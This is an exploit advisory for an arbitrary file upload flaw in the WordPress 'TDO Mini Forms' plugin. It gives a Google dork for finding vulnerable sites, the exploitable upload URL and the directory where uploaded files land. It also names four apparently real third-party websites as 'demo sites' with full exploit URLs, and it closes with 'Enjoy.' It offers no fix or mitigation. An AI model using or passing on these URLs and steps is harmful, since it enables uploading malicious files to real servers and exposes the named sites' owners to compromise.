WordPress TDO Mini Forms Arbitrary File Upload

`  
# Exploit Title: Wordpress "TDO Mini Forms" File Upload Vulnerability  
  
# Google Dork: "tdomf-upload-inline.php?tdomf_form_id=1 index"  
  
# Date: 31/9/12  
  
# Exploit Author: HodLuM  
  
# Vendor Homepage: unknown  
  
# Software Link: http://thedeadone.net/download/tdo-mini-forms-wordpress-plugin/  
  
# Version: All  
  
# Tested on: 2.x.x to 3.x.x  
# Email: [email protected] - [email protected]  
  
  
  
~#Exploit:  
  
site.com/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=  
  
  
~#Uploaded files go to:  
  
site.com/wp-content/plugins/tdo-mini-forms/attachments/FILE.*  
  
Demo sites:   
http://waqtnews.tv/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=  
http://funnyfuntoosh.com/blogs/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=  
http://ideabank.utm.my/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=  
http://www.mormonmissionprep.com/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=  
  
  
Enjoy.  
  
`